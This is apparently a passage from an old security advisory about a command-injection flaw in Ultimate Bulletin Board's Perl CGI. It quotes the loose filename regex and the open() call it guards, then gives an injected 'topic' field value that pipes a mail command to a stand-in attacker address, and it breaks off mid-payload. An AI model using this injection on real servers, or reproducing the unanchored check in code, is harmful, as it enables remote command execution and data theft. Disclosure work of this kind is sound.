Hello. Writing cgi scripts in perl is simple. It's also rather safe, providing authors follow very simple instructions. But they don't. Browsing some site, I found that their forums were based not on home- made scripts, but rather commercial software product. Hey, said I to myself, remember those story about pcweek hack ? They use commercial package photoads. Let's look what that Ultimate Bulletin Board by Infopop is. I grabbed freeware version from http://www.ultimatebb.com and after 10-minutes grepping found those lines: ubb_library.pl:901-902 if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) { open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile"); (notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while writing it ? Girls ?) And the $ThreadFile takes its value directly from the hidden (hmm!) field `topic'. So when I filled the form with topic='012345.ubb|mail hacker@evil.com